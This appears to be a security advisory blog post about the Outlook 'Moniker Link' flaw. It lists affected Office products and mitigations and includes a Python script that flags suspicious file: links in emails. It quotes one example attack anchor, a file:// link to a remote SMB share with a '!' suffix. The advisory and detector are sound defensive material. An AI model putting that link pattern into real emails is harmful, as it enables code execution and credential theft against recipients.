Categories: CyberHoot

Advisory: Critical Microsoft Outlook Vulnerability

Overview

A Check Point security researcher has discovered a critical vulnerability in Microsoft Outlook that poses an imminent and serious cybersecurity risk to users. The flaw is a zero-day vulnerability that lets threat actors exploit the Outlook client with a specially crafted malicious email. It is being actively exploited in the wild as of this article, and patches are available from Microsoft to fix the issue.

The ‘Moniker Link’ Attack Vulnerability Details

The “Moniker Link” attack allows threat actors to bypass Outlook’s built-in protected-mode safeguards. This approach involves embedding malicious links in emails via the file:// protocol and appending an exclamation mark to URLs that lead to attacker-controlled servers.

For example, an attack URL might be:

<a href="file:///\\192.168.1.1\test\test.rtf!moretext">CLICK ME</a>

The flaw enables attackers to execute arbitrary code on a victim’s system simply by delivering a malicious email. In some cases no user interaction is required to trigger the exploit: opening the email in Preview mode is enough for the attack to detonate. Once exploited, attackers can gain unauthorized access, install malware, steal sensitive data, or take control of affected systems!

The vulnerability impacts multiple Office products, including:

  • Microsoft Office LTSC 2021
  • Microsoft 365 Apps for Enterprise
  • Microsoft Outlook 2016
  • Microsoft Office 2019

Potential Impact

Organizations and individual users who rely on Microsoft Outlook for email communication are at high risk. The vulnerability can:

  • Allow remote code execution without user interaction.
  • Enable attackers to deploy ransomware, spyware, or other malicious software.
  • Lead to data breaches and unauthorized access to corporate networks.

Mitigation Steps

Microsoft has released official security patches, and users are strongly advised to install them immediately. If you are unable to patch immediately, you can take the following mitigating measures:

  1. Apply Temporary Security Measures: Restrict access to Outlook or disable automatic email previews to reduce exposure.
  2. Enable Advanced Threat Protection (ATP): If using Microsoft 365, ensure that ATP is enabled to detect and block malicious attachments.
  3. Implement Network Segmentation: Limit access to sensitive data by segmenting networks and restricting unnecessary privileges.
  4. Monitor for Suspicious Activity: Regularly check logs and security alerts for unusual activity related to Outlook.
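
One way to support the monitoring step for the link pattern described above, as an added example that is not code from CyberHoot, Check Point or Microsoft: a Python check that parses a message's HTML parts and flags anchors whose href uses the file: scheme and carries an exclamation mark. The function names, host names and sample messages are constructed for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser


class _HrefCollector(HTMLParser):
    """Collects href values from <a> tags in an HTML body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)


def is_moniker_style(href):
    """True when a link uses the file: scheme and has a '!' after it."""
    h = href.strip().lower()
    return h.startswith("file:") and "!" in h[len("file:"):]


def find_moniker_links(raw_message):
    """Return suspicious hrefs from every text/html part of a raw message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        parser = _HrefCollector()
        parser.feed(part.get_content())
        hits.extend(h for h in parser.hrefs if is_moniker_style(h))
    return hits


def _sample(href):
    """Build a constructed single-part HTML email around one link."""
    return (
        "From: a@example.invalid\nTo: b@example.invalid\nSubject: constructed\n"
        "MIME-Version: 1.0\nContent-Type: text/html; charset=utf-8\n\n"
        f'<html><body><a href="{href}">CLICK ME</a></body></html>\n'
    )


# Constructed samples: one matching the described pattern, two that do not.
SUSPICIOUS = _sample(r"file:///\\files.example.invalid\share\doc.rtf!x")
BENIGN_WEB = _sample("https://example.invalid/report!final.html")
PLAIN_FILE = _sample(r"file:///\\files.example.invalid\share\doc.rtf")
```

A plain file: link without the exclamation mark is deliberately not flagged here; whether to alert on those as well depends on how common internal file links are in your mail flow.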

Conclusion

This Microsoft Outlook vulnerability is a very serious security threat that requires immediate patching. Organizations unable to immediately patch must implement the temporary protections. Please deploy Microsoft’s security patch as soon as you are able. Taking proactive steps now can help prevent potential cyberattacks and safeguard critical information.

For the latest Microsoft updates on this vulnerability, please view the link below.

Published by
rssfeeds-admin
